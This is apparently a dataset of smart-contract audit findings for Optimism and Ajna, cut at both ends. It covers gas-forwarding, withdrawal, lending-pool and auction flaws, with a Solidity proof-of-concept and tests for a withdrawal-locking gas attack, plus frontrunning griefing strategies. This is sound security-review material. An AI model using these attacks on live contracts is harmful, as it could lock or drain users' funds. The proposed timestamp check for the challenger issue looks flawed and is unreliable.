of the `OptimismPortal` is that there is no replaying of transactions. If a transaction fails, it will simply fail, and all ETH associated with it will remain in the `OptimismPortal` contract. Users have been warned of this and understand the risks, so Optimism takes no responsibility for user error.\\nIn order to ensure that failed transactions can only happen at the fault of the user, the contract implements a check to ensure that the gasLimit is sufficient:\\n```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n \"OptimismPortal: insufficient gas to finalize withdrawal\"\\n);\\n```\\n\\nWhen the transaction is executed, the contract requests to send along all the remaining gas, minus the hardcoded `FINALIZE_GAS_BUFFER` for actions after the call. The goal is that this will ensure that the amount of gas forwarded on is at least the gas limit specified by the user.\\nOptimism is aware of the importance of this property being correct when they write in the comments:\\n“We want to maintain the property that the amount of gas supplied to the call to the target contract is at least the gas limit specified by the user. We can do this by enforcing that, at this point in time, we still have gaslimit + buffer gas available.”\\nThe issue is that the EVM specifies the maximum gas that can be sent to an external call as 63/64ths of the `gasleft()`. For very large gas limits, this 1/64th that remains could be greater than the hardcoded FINALIZE_GAS_BUFFER value. In this case, less gas would be forwarded along than was directed by the contract.\\nHere is a quick overview of the math:\\nWe need X gas to be sent as a part of the call.\\nThis means we need `X * 64 / 63` gas to be available at the time the function is called.\\nHowever, the only check is that we have `X + 20_000` gas a few operations prior to the call (which guarantees that we have `X + 14878` at the time of the call).\\nFor any situation where `X / 64 > 14878` (in other words, when the amount of gas sent is greater than 952_192), the caller is able to send an amount of gas that passes the check, but doesn't forward the required amount on in the call.чChange the check to account for this 63/64 rule:\\n```\\nrequire(\\n gasleft() >= (_tx.gasLimit + FINALIZE_GAS_BUFFER) * 64 / 63,\\n \"OptimismPortal: insufficient gas to finalize withdrawal\"\\n);\\n```\\nчFor any withdrawal with a gas limit of at least 952,192, a malicious user can call `finalizeWithdrawalTransaction()` with an amount of gas that will pass the checks, but will end up forwarding along less gas than was specified by the user.\\nThe result is that the withdrawing user can have their funds permanently locked in the `OptimismPortal` contract.\\nProof of Concept\\nTo test this behavior in a sandboxed environment, you can copy the following proof of concept.\\nHere are three simple contracts that replicate the behavior of the Portal, as well as an external contract that uses a predefined amount of gas.\\n(Note that we added 5122 to the gas included in the call to correct for the other bug we submitted, as this issue remains even when the other bug is patched.)\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nlibrary SafeCall {\\n /**\\n * @notice Perform a low level call without copying any returndata\\n *\\n * @param _target Address to call\\n * @param _gas Amount of gas to pass to the call\\n * @param _value Amount of value to pass to the call\\n * @param _calldata Calldata to pass to the call\\n */\\n function call(\\n address _target,\\n uint256 _gas,\\n uint256 _value,\\n bytes memory _calldata\\n ) internal returns (bool) {\\n bool _success;\\n assembly {\\n _success := call(\\n _gas, // gas\\n _target, // recipient\\n _value, // ether value\\n add(_calldata, 0x20), // inloc\\n mload(_calldata), // inlen\\n 0, // outloc\\n 0 // outlen\\n )\\n }\\n return _success;\\n }\\n}\\n\\ncontract GasUser {\\n uint[] public s;\\n\\n function store(uint i) public {\\n for (uint j = 0; j < i; j++) {\\n s.push(1);\\n }\\n }\\n}\\n\\ncontract Portal {\\n address l2Sender;\\n\\n struct Transaction {\\n uint gasLimit;\\n address sender;\\n address target;\\n uint value;\\n bytes data;\\n }\\n\\n constructor(address _l2Sender) {\\n l2Sender = _l2Sender;\\n }\\n\\n function execute(Transaction memory _tx) public {\\n require(\\n gasleft() >= _tx.gasLimit + 20000,\\n \"OptimismPortal: insufficient gas to finalize withdrawal\"\\n );\\n\\n // Set the l2Sender so contracts know who triggered this withdrawal on L2.\\n l2Sender = _tx.sender;\\n\\n // Trigger the call to the target contract. We use SafeCall because we don't\\n // care about the returndata and we don't want target contracts to be able to force this\\n // call to run out of gas via a returndata bomb.\\n bool success = SafeCall.call(\\n _tx.target,\\n gasleft() - 20000 + 5122, // fix for other bug\\n _tx.value,\\n _tx.data\\n );\\n }\\n}\\n```\\n\\nHere is a Foundry test that calls the Portal with various gas values to expose this vulnerability:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport \"forge-std/Test.sol\";\\nimport \"../src/Portal.sol\";\\n\\ncontract PortalGasTest is Test {\\n Portal public c;\\n GasUser public gu;\\n\\n function setUp() public {\\n c = new Portal(0x000000000000000000000000000000000000dEaD);\\n gu = new GasUser();\\n }\\n\\n function testGasLimitForGU() public {\\n gu.store{gas: 11_245_655}(500);\\n assert(gu.s(499) == 1);\\n }\\n\\n function _executePortalWithGivenGas(uint gas) public {\\n c.execute{gas: gas}(Portal.Transaction({\\n gasLimit: 11_245_655,\\n sender: address(69),\\n target: address(gu),\\n value: 0,\\n data: abi.encodeWithSignature(\"store(uint256)\", 500)\\n }));\\n }\\n\\n function testPortalCatchesGasTooSmall() public {\\n vm.expectRevert(bytes(\"OptimismPortal: insufficient gas to finalize withdrawal\"));\\n _executePortalWithGivenGas(11_266_734);\\n }\\n\\n function testPortalSucceedsWithEnoughGas() public {\\n _executePortalWithGivenGas(11_433_180);\\n assert(gu.s(499) == 1);\\n }\\n\\n function testPortalBugWithInBetweenGasLow() public {\\n _executePortalWithGivenGas(11_266_735);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n\\n function testPortalBugWithInBetweenGasHigh() public {\\n _executePortalWithGivenGas(11_433_179);\\n \\n // It now reverts because the array has a length of 0.\\n vm.expectRevert();\\n gu.s(0);\\n }\\n}\\n```\\n\\nAs you can see:\\nWe verify that the call to the target contract succeeds with 11,245,655 gas, and set that as gasLimit for all tests. This is the `X` from our formula above.\\nThis means that we need `11_245_655 * 64 / 63 = 11_424_157` gas available at the time the call is made.\\nThe test uses `9023` gas before it makes our call, so we can see that if we send `11_424_157 + 9_023 = 11_433_180` gas, the test passes.\\nSimilarly, if we send `11_266_734` gas, the total gas will be small enough to fail the require check.\\nBut in the sweet spot between these values, we have enough gas to pass the require check, but when we get to the call, the amount of gas requested is more than 63/64ths of the total, so the EVM sends less than we asked for. As a result, the transaction fails.ч```\\nrequire(\\n gasleft() >= _tx.gasLimit + FINALIZE_GAS_BUFFER,\\n \"OptimismPortal: insufficient gas to finalize withdrawal\"\\n);\\n```\\n -Challenger can override the 7 day finalization periodчmediumчAll withdrawals are finalized after a 7 days window (finalization period). After this duration transaction are confirmed and user can surely withdraw their balance. But due to lack of check, challenger can delete a l2Output which is older than 7 days meaning withdrawals will stop working for even confirmed transaction\\nProposer has proposed L2 output for a _l2BlockNumber which creates entries on l2Outputs using the proposeL2Output. Assume this creates a new l2Output at index X\\n```\\nl2Outputs.push(\\n Types.OutputProposal({\\n outputRoot: _outputRoot,\\n timestamp: uint128(block.timestamp),\\n l2BlockNumber: uint128(_l2BlockNumber)\\n })\\n );\\n```\\n\\nproveWithdrawalTransaction has been called for user linked to this l2Output\\nFinalization period(7 day) is over after proposal and Users is ready to call `finalizeWithdrawalTransaction` to withdraw their funds\\nSince confirmation is done, User A is sure that he will be able to withdraw and thinks to do it after coming back from his holidays\\nChallenger tries to delete the index X (Step 1), ideally it should not be allowed as already confirmed. But since there is no such timeline check so the l2Output gets deleted\\n```\\nfunction deleteL2Outputs(uint256 _l2OutputIndex) external {\\n require(\\n msg.sender == CHALLENGER,\\n \"L2OutputOracle: only the challenger address can delete outputs\"\\n );\\n\\n // Make sure we're not *increasing* the length of the array.\\n require(\\n _l2OutputIndex < l2Outputs.length,\\n \"L2OutputOracle: cannot delete outputs after the latest output index\"\\n );\\n\\n uint256 prevNextL2OutputIndex = nextOutputIndex();\\n\\n // Use assembly to delete the array elements because Solidity doesn't allow it.\\n assembly {\\n sstore(l2Outputs.slot, _l2OutputIndex)\\n }\\n\\n emit OutputsDeleted(prevNextL2OutputIndex, _l2OutputIndex);\\n }\\n```\\n\\nUser comes back and now tries to withdraw but the withdraw fails since the l2Output index X does not exist anymore. This is incorrect and nullifies the network guarantee.\\nNote: In case of a separate output root could be proven then user withdrawal will permanently stuck. Ideally if such anomaly could not be caught within finalization period then user should be allowed to withdrawчAdd below check in\\n```\\nrequire(getL2Output(_l2OutputIndex).timestamp<=FINALIZATION_PERIOD_SECONDS, \"Output already confirmed\");\\n```\\nчWithdrawal will fail for confirmed transactionч```\\nl2Outputs.push(\\n Types.OutputProposal({\\n outputRoot: _outputRoot,\\n timestamp: uint128(block.timestamp),\\n l2BlockNumber: uint128(_l2BlockNumber)\\n })\\n );\\n```\\n -user can drawDebt that is below dust amountчmediumчAccording to the protocol, drawDebt prevents user from drawing below the `quoteDust_` amount. However, a logical error in the code can allow user to draw below dust amount.\\n`_revertOnMinDebt` is used in `drawDebt` to prevent dust loans. As you can see, the protocol wants to take the average of debt in the pool and make it the minimum if there are 10 or more loans. If it is lower than 10 loans, a `quoteDust` is used as the minimum. There is an edge case, whereby there are 10 loans in the pool, and the borrowers repay the loans till there is only 1 unit owed for each loan.(Might revert due to rounding error but it is describing a situation whereby repaying till a low amount of poolDebt can enable this). A new borrower can then `drawDebt` and because `_revertOnMindebt` only goes through the average loan amount check and not the `quoteDust_` amount check, he/she is able to draw loan that is well below the `quoteDust_` amount.\\n```\\n function _revertOnMinDebt(\\n LoansState storage loans_,\\n uint256 poolDebt_,\\n uint256 borrowerDebt_,\\n uint256 quoteDust_\\n ) view {\\n if (borrowerDebt_ != 0) {\\n uint256 loansCount = Loans.noOfLoans(loans_);\\n if (loansCount >= 10) {\\n if (borrowerDebt_ < _minDebtAmount(poolDebt_, loansCount)) revert AmountLTMinDebt();\\n } else {\\n if (borrowerDebt_ < quoteDust_) revert DustAmountNotExceeded();\\n }\\n }\\n }\\n```\\n\\n```\\n function _minDebtAmount(\\n uint256 debt_,\\n uint256 loansCount_\\n ) pure returns (uint256 minDebtAmount_) {\\n if (loansCount_ != 0) {\\n minDebtAmount_ = Maths.wdiv(Maths.wdiv(debt_, Maths.wad(loansCount_)), 10**19);\\n }\\n }\\n```\\nчIssue user can drawDebt that is below dust amount\\nRecommend checking that loan amount is more than `quoteDust_` regardless of the loan count.\\n```\\n function _revertOnMinDebt(\\n LoansState storage loans_,\\n uint256 poolDebt_,\\n uint256 borrowerDebt_,\\n uint256 quoteDust_\\n ) view {\\n if (borrowerDebt_ != 0) {\\n uint256 loansCount = Loans.noOfLoans(loans_);\\n if (loansCount >= 10) {\\n if (borrowerDebt_ < _minDebtAmount(poolDebt_, loansCount)) revert AmountLTMinDebt();\\n } \\n if (borrowerDebt_ < quoteDust_) revert DustAmountNotExceeded();\\n \\n }\\n }\\n```\\nчA minimum loan amount is used to deter dust loans, which can diminish user experience.ч```\\n function _revertOnMinDebt(\\n LoansState storage loans_,\\n uint256 poolDebt_,\\n uint256 borrowerDebt_,\\n uint256 quoteDust_\\n ) view {\\n if (borrowerDebt_ != 0) {\\n uint256 loansCount = Loans.noOfLoans(loans_);\\n if (loansCount >= 10) {\\n if (borrowerDebt_ < _minDebtAmount(poolDebt_, loansCount)) revert AmountLTMinDebt();\\n } else {\\n if (borrowerDebt_ < quoteDust_) revert DustAmountNotExceeded();\\n }\\n }\\n }\\n```\\n -CryptoKitty and CryptoFighter NFT can be paused, which block borrowing / repaying / liquidating action in the ERC721Pool when borrowers still forced to pay the compounding interestчmediumчCryptoKitty and CryptoFighter NFT can be paused, which block borrowing / repaying / liquidating action in the ERC721Pool\\nIn the current implementation in the factory contract and the pool contract, special logic is in-place to handle non-standard NFT such as crypto-kitty, crypto-figher or crypto punk.\\nIn the factory contract:\\n```\\nNFTTypes nftType;\\n// CryptoPunks NFTs\\nif (collateral_ == 0xb47e3cd837dDF8e4c57F05d70Ab865de6e193BBB ) {\\n nftType = NFTTypes.CRYPTOPUNKS;\\n}\\n// CryptoKitties and CryptoFighters NFTs\\nelse if (collateral_ == 0x06012c8cf97BEaD5deAe237070F9587f8E7A266d || collateral_ == 0x87d598064c736dd0C712D329aFCFAA0Ccc1921A1) {\\n nftType = NFTTypes.CRYPTOKITTIES;\\n}\\n// All other NFTs that support the EIP721 standard\\nelse {\\n // Here 0x80ac58cd is the ERC721 interface Id\\n // Neither a standard NFT nor a non-standard supported NFT(punk, kitty or fighter)\\n try IERC165(collateral_).supportsInterface(0x80ac58cd) returns (bool supportsERC721Interface) {\\n if (!supportsERC721Interface) revert NFTNotSupported();\\n } catch {\\n revert NFTNotSupported();\\n }\\n\\n nftType = NFTTypes.STANDARD_ERC721;\\n}\\n```\\n\\nAnd in ERC721Pool When handling ERC721 token transfer:\\n```\\n/**\\n * @notice Helper function for transferring multiple NFT tokens from msg.sender to pool.\\n * @notice Reverts in case token id is not supported by subset pool.\\n * @param poolTokens_ Array in pool that tracks NFT ids (could be tracking NFTs pledged by borrower or NFTs added by a lender in a specific bucket).\\n * @param tokenIds_ Array of NFT token ids to transfer from msg.sender to pool.\\n */\\nfunction _transferFromSenderToPool(\\n uint256[] storage poolTokens_,\\n uint256[] calldata tokenIds_\\n) internal {\\n bool subset = _getArgUint256(SUBSET) != 0;\\n uint8 nftType = _getArgUint8(NFT_TYPE);\\n\\n for (uint256 i = 0; i < tokenIds_.length;) {\\n uint256 tokenId = tokenIds_[i];\\n if (subset && !tokenIdsAllowed[tokenId]) revert OnlySubset();\\n poolTokens_.push(tokenId);\\n\\n if (nftType == uint8(NFTTypes.STANDARD_ERC721)){\\n _transferNFT(msg.sender, address(this), tokenId);\\n }\\n else if (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transferFrom(msg.sender ,address(this), tokenId);\\n }\\n else{\\n ICryptoPunks(_getArgAddress(COLLATERAL_ADDRESS)).buyPunk(tokenId);\\n }\\n\\n unchecked { ++i; }\\n }\\n}\\n```\\n\\nand\\n```\\nuint8 nftType = _getArgUint8(NFT_TYPE);\\n\\nfor (uint256 i = 0; i < amountToRemove_;) {\\n uint256 tokenId = poolTokens_[--noOfNFTsInPool]; // start with transferring the last token added in bucket\\n poolTokens_.pop();\\n\\n if (nftType == uint8(NFTTypes.STANDARD_ERC721)){\\n _transferNFT(address(this), toAddress_, tokenId);\\n }\\n else if (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transfer(toAddress_, tokenId);\\n }\\n else {\\n ICryptoPunks(_getArgAddress(COLLATERAL_ADDRESS)).transferPunk(toAddress_, tokenId);\\n }\\n\\n tokensTransferred[i] = tokenId;\\n\\n unchecked { ++i; }\\n}\\n```\\n\\nnote if the NFT address is classified as either crypto kitties or crypto fighers, then the NFT type is classified as CryptoKitties, then transfer and transferFrom method is triggered.\\n```\\nif (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transferFrom(msg.sender ,address(this), tokenId);\\n }\\n```\\n\\nand\\n```\\nelse if (nftType == uint8(NFTTypes.CRYPTOKITTIES)) {\\n ICryptoKitties(_getArgAddress(COLLATERAL_ADDRESS)).transfer(toAddress_, tokenId);\\n}\\n```\\n\\nHowever, in both crypto-kitty and in crypto-figher NFT, the transfer and transferFrom method can be paused.\\nIn crypto-figher NFT:\\n```\\nfunction transferFrom(\\n address _from,\\n address _to,\\n uint256 _tokenId\\n)\\n public\\n whenNotPaused\\n{\\n```\\n\\nIn Crypto-kitty NFT:\\n```\\nfunction transferFrom(\\n address _from,\\n address _to,\\n uint256 _tokenId\\n)\\n external\\n whenNotPaused\\n{\\n```\\n\\nnote the WhenNotPaused modifier.чIssue CryptoKitty and CryptoFighter NFT can be paused, which block borrowing / repaying / liquidating action in the ERC721Pool when borrowers still forced to pay the compounding interest\\nInterest should not be charged when external contract is paused to borrower when the external contract pause the transfer and transferFrom.чIf the transfer and transferFrom is paused in CryptoKitty and CryptoFighter NFT, the borrowing and repaying and liquidating action is blocked in ERC721Pool, the user cannot fully clear his debt and has to pay the compounding interest when the transfer is paused.ч```\\nNFTTypes nftType;\\n// CryptoPunks NFTs\\nif (collateral_ == 0xb47e3cd837dDF8e4c57F05d70Ab865de6e193BBB ) {\\n nftType = NFTTypes.CRYPTOPUNKS;\\n}\\n// CryptoKitties and CryptoFighters NFTs\\nelse if (collateral_ == 0x06012c8cf97BEaD5deAe237070F9587f8E7A266d || collateral_ == 0x87d598064c736dd0C712D329aFCFAA0Ccc1921A1) {\\n nftType = NFTTypes.CRYPTOKITTIES;\\n}\\n// All other NFTs that support the EIP721 standard\\nelse {\\n // Here 0x80ac58cd is the ERC721 interface Id\\n // Neither a standard NFT nor a non-standard supported NFT(punk, kitty or fighter)\\n try IERC165(collateral_).supportsInterface(0x80ac58cd) returns (bool supportsERC721Interface) {\\n if (!supportsERC721Interface) revert NFTNotSupported();\\n } catch {\\n revert NFTNotSupported();\\n }\\n\\n nftType = NFTTypes.STANDARD_ERC721;\\n}\\n```\\n -`moveQuoteToken()` can cause bucket to go bankrupt but it is not reflected in the accountingчhighчBoth `removeQuoteToken()` and `moveQuoteToken()` can be used to completely remove all quote tokens from a bucket. When this happens, if at the same time `bucketCollateral == 0 && lpsRemaining != 0`, then the bucket should be declared bankrupt. This update is done in `removeQuoteToken()` but not in `moveQuoteToken()`.\\n`removeQuoteToken()` has the following check to update bankruptcy time when collateral and quote token remaining is 0, but lps is more than 0. `moveQuoteToken()` is however missing this check. Both this functions has the same effects on the `fromBucket` and the only difference is that `removeQuoteToken()` returns the token to `msg.sender` but `moveQuoteToken()` moves the token to another bucket.\\n```\\nif (removeParams.bucketCollateral == 0 && unscaledRemaining == 0 && lpsRemaining != 0) {\\n emit BucketBankruptcy(params_.index, lpsRemaining);\\n bucket.lps = 0;\\n bucket.bankruptcyTime = block.timestamp;\\n} else {\\n bucket.lps = lpsRemaining;\\n}\\n```\\nчIssue `moveQuoteToken()` can cause bucket to go bankrupt but it is not reflected in the accounting\\nWe should check if a bucket is bankrupt after moving quote tokens.чA future depositor to the bucket will get less lps than expected due to depositing in a bucket that is supposedly bankrupt, hence the lps they get will be diluted with the existing ones in the bucket.ч```\\nif (removeParams.bucketCollateral == 0 && unscaledRemaining == 0 && lpsRemaining != 0) {\\n emit BucketBankruptcy(params_.index, lpsRemaining);\\n bucket.lps = 0;\\n bucket.bankruptcyTime = block.timestamp;\\n} else {\\n bucket.lps = lpsRemaining;\\n}\\n```\\n -The deposit / withdraw / trade transaction lack of expiration timestamp check and slippage controlчhighчThe deposit / withdraw / trade transaction lack of expiration timestamp and slippage control\\nLet us look into the heavily forked Uniswap V2 contract addLiquidity function implementation\\n```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n\\nthe implementation has two point that worth noting,\\nthe first point is the deadline check\\n```\\nmodifier ensure(uint deadline) {\\n require(deadline >= block.timestamp, 'UniswapV2Router: EXPIRED');\\n _;\\n}\\n```\\n\\nThe transaction can be pending in mempool for a long and the trading activity is very time senstive. Without deadline check, the trade transaction can be executed in a long time after the user submit the transaction, at that time, the trade can be done in a sub-optimal price, which harms user's position.\\nThe deadline check ensure that the transaction can be executed on time and the expired transaction revert.\\nthe second point is the slippage control:\\n```\\nrequire(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n```\\n\\nand\\n```\\nrequire(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n```\\n\\nthe slippage control the user can receive the least optimal amount of the token they want to trade.\\nIn the current implementation, neither the deadline check nor the slippage control is in place when user deposit / withdraw / trade.чIssue The deposit / withdraw / trade transaction lack of expiration timestamp check and slippage control\\nWe recommend the protocol add deadline check and add slippage control.чAccording to the whitepaper:\\nDeposits in the highest priced buckets offer the highest valuations on collateral, and hence offer the most liquidity to borrowers. They are also the first buckets that could be used to purchase collateral if a loan were to be liquidated (see 7.0 LIQUIDATIONS). We can think of a bucket's deposit as being utilized if the sum of all deposits in buckets priced higher than it is less than the total debt of all borrowers in the pool. The lowest price among utilized buckets or “lowest utilized price” is called the LUP. If we were to pair off lenders with borrowers, matching the highest priced lenders' deposits with the borrowers' debts in equal quantities, the LUP would be the price of the marginal (lowest priced and therefore least aggressive) lender thus matched (usually, there would be a surplus of lenders that were not matched, corresponding to less than 100% utilization of the pool).\\nThe LUP plays a critical role in Ajna: a borrower who is undercollateralized with respect to the LUP (i.e. with respect to the marginal utilized lender) is eligible for liquidation. Conversely, a lender cannot withdraw deposit if doing so would move the LUP down so far as to make some active loans eligible for liquidation. In order to withdraw quote token in this situation, the lender must first kick the loans in question.\\nBecause the deadline check is missing,\\nAfter a lender submit a transaction and want to add the token into Highest price busket to make sure the quote token can be borrowed out and generate yield.\\nHowever, the transaction is pending in the mempool for a very long time.\\nBorrower create more debt and other lender's add and withdraw quote token before the lender's transaction is executed.\\nAfter a long time later, the lender's transaction is executed.\\nThe lender find out that the highest priced bucket moved and the lender cannot withdraw his token because doing would move the LUP down eligible for liquidiation.\\nAccording to the whitepaper:\\n6.1 Trading collateral for quote token\\nDavid owns 1 ETH, and would like to sell it for 1100 DAI. He puts the 1 ETH into the 1100 bucket as claimable collateral (alongside Carol's 20000 deposit), minting 1100 in LPB in return. He can then redeem that 1100 LPB for quote token, withdrawing 1100 DAI. Note: after David's withdrawal, the LUP remains at 1100. If the book were different such that his withdrawal would move the LUP below Bob's threshold price of 901.73, he would not be able to withdraw all of the DAI.\\nThe case above is ideal, however, because the deadline check is missing, and there is no slippage control, the transactoin can be pending for a long time and by the time the trade transaction is lended, the withdraw amount can be less than 1100 DAI.\\nAnother example for lack of slippage, for example, the function below is called:\\n```\\n/// @inheritdoc IPoolLenderActions\\nfunction removeQuoteToken(\\n uint256 maxAmount_,\\n uint256 index_\\n) external override nonReentrant returns (uint256 removedAmount_, uint256 redeemedLPs_) {\\n _revertIfAuctionClearable(auctions, loans);\\n\\n PoolState memory poolState = _accruePoolInterest();\\n\\n _revertIfAuctionDebtLocked(deposits, poolBalances, index_, poolState.inflator);\\n\\n uint256 newLup;\\n (\\n removedAmount_,\\n redeemedLPs_,\\n newLup\\n ) = LenderActions.removeQuoteToken(\\n buckets,\\n deposits,\\n poolState,\\n RemoveQuoteParams({\\n maxAmount: maxAmount_,\\n index: index_,\\n thresholdPrice: Loans.getMax(loans).thresholdPrice\\n })\\n );\\n\\n // update pool interest rate state\\n _updateInterestState(poolState, newLup);\\n\\n // move quote token amount from pool to lender\\n _transferQuoteToken(msg.sender, removedAmount_);\\n}\\n```\\n\\nwithout specificing the minReceived amount, the removedAmount can be very small comparing to the maxAmount user speicifced.ч```\\n// **** ADD LIQUIDITY ****\\nfunction _addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin\\n) internal virtual returns (uint amountA, uint amountB) {\\n // create the pair if it doesn't exist yet\\n if (IUniswapV2Factory(factory).getPair(tokenA, tokenB) == address(0)) {\\n IUniswapV2Factory(factory).createPair(tokenA, tokenB);\\n }\\n (uint reserveA, uint reserveB) = UniswapV2Library.getReserves(factory, tokenA, tokenB);\\n if (reserveA == 0 && reserveB == 0) {\\n (amountA, amountB) = (amountADesired, amountBDesired);\\n } else {\\n uint amountBOptimal = UniswapV2Library.quote(amountADesired, reserveA, reserveB);\\n if (amountBOptimal <= amountBDesired) {\\n require(amountBOptimal >= amountBMin, 'UniswapV2Router: INSUFFICIENT_B_AMOUNT');\\n (amountA, amountB) = (amountADesired, amountBOptimal);\\n } else {\\n uint amountAOptimal = UniswapV2Library.quote(amountBDesired, reserveB, reserveA);\\n assert(amountAOptimal <= amountADesired);\\n require(amountAOptimal >= amountAMin, 'UniswapV2Router: INSUFFICIENT_A_AMOUNT');\\n (amountA, amountB) = (amountAOptimal, amountBDesired);\\n }\\n }\\n}\\n\\nfunction addLiquidity(\\n address tokenA,\\n address tokenB,\\n uint amountADesired,\\n uint amountBDesired,\\n uint amountAMin,\\n uint amountBMin,\\n address to,\\n uint deadline\\n) external virtual override ensure(deadline) returns (uint amountA, uint amountB, uint liquidity) {\\n (amountA, amountB) = _addLiquidity(tokenA, tokenB, amountADesired, amountBDesired, amountAMin, amountBMin);\\n address pair = UniswapV2Library.pairFor(factory, tokenA, tokenB);\\n TransferHelper.safeTransferFrom(tokenA, msg.sender, pair, amountA);\\n TransferHelper.safeTransferFrom(tokenB, msg.sender, pair, amountB);\\n liquidity = IUniswapV2Pair(pair).mint(to);\\n}\\n```\\n -Adversary can grief kicker by frontrunning kickAuction call with a large amount of loanчmediumчAverage debt size of the pool is used to calculated MOMP (Most optimistic matching price), which is used to derive NP (neutral price). Higher average debt size will result in lower MOMP and hence lower NP which will make it harder for kicker to earn a reward and more likely that the kicker is penalized. An adversary can manipulate the average debt size of the pool by frontrunning kicker's `kickAuction` call with a large amount of loan.\\nNP (neutral price) is a price that will be used to decide whether to reward a kicker with a bonus or punish the kicker with a penalty. In the event the auction ends with a price higher than NP, kicker will be given a penalty and if the auction ends with a price lower than NP, kicker will be rewarded with a bonus.\\nNP is derived from MOMP (Most optimistic matching price). BI refers to borrower inflator. Quoted from the whitepaper page 17, When a loan is initiated (the first debt or additional debt is drawn, or collateral is removed from the loan), the neutral price is set to the current MOMP times the ratio of the loan's threshold price to the LUP, plus one year's interest. As time passes, the neutral price increases at the same rate as interest. This can be expressed as the following formula for the neutral price as a function of time 𝑡, where 𝑠 is the time the loan is initiated.\\n```\\n NP_t = (1 + rate_s) * MOMP_s * TP_s * \\frac{TP_s}{LUP_s} * \\frac{BI_s}{BI_t}\\n```\\n\\nTherefore the lower the MOMP, the lower the NP. Lower NP will mean that kicker will be rewarded less and punished more compared to a higher NP. Quoted from the white paper, The MOMP, or “most optimistic matching price,” is the price at which a loan of average size would match with the most favorable lenders on the book. Technically, it is the highest price for which the amount of deposit above it exceeds the average loan debt of the pool. In `_kick` function, MOMP is calculated as this. Notice how total pool debt is divided by number of loans to find the average loan debt size.\\n```\\n uint256 momp = _priceAt(\\n Deposits.findIndexOfSum(\\n deposits_,\\n Maths.wdiv(poolState_.debt, noOfLoans * 1e18)\\n )\\n );\\n```\\n\\nAn adversary can frontrun `kickAuction` by taking a huge loan, causing the price for which the amount of deposit above the undercollaterized loan bucket to have a lower probability of surpassing the average loan debt. The adversary can use the deposits for the buckets above and the total pool debt to figure out how much loan is necessary to grief the kicker significantly by lowering the MOMP and NP.чRecommend taking the snapshot average loan size of the pool to prevent frontrunning attacks.чKickers can be grieved which can disincentivize user from kicking loans that deserve to be liquidated, causing the protocol to not work as desired as undercollaterized loans will not be liquidated.ч```\\n NP_t = (1 + rate_s) * MOMP_s * TP_s * \\frac{TP_s}{LUP_s} * \\frac{BI_s}{BI_t}\\n```\\n -Auction timers following liquidity can fall through the floor price causing pool insolvencyчmediumчWhen a borrower cannot pay their debt in an ERC20 pool, their position is liquidated and their assets enter an auction for other users to purchase small pieces of their assets. Because of the incentive that users wish to not pay above the standard market price for a token, users will generally wait until assets on auction are as cheap as possible to purchase however, this is flawed because this guarantees a loss for all lenders participating in the protocol with each user that is liquidated.\\nConsider a situation where a user decides to short a coin through a loan and refuses to take the loss to retain the value of their position. When the auction is kicked off using the `kick()` function on this user, as time moves forward, the price for puchasing these assets becomes increasingly cheaper. These prices can fall through the floor price of the lending pool which will allow anybody to buy tokens for only a fraction of what they were worth originally leading to a state where the pool cant cover the debt of the user who has not paid their loan back with interest. The issue lies in the `_auctionPrice()` function of the `Auctions.sol` contract which calculates the price of the auctioned assets for the taker. This function does not consider the floor price of the pool. The proof of concept below outlines this scenario:\\nProof of Concept:\\n```\\n function testInsolvency() public {\\n \\n // ============== Setup Scenario ==============\\n uint256 interestRateOne = 0.05 * 10**18; // Collateral // Quote (loaned token, short position)\\n address poolThreeAddr = erc20PoolFactory.deployPool(address(dai), address(weth), interestRateOne);\\n ERC20Pool poolThree = ERC20Pool(address(poolThreeAddr));\\n vm.label(poolThreeAddr, \"DAI / WETH Pool Three\");\\n\\n // Setup scenario and send 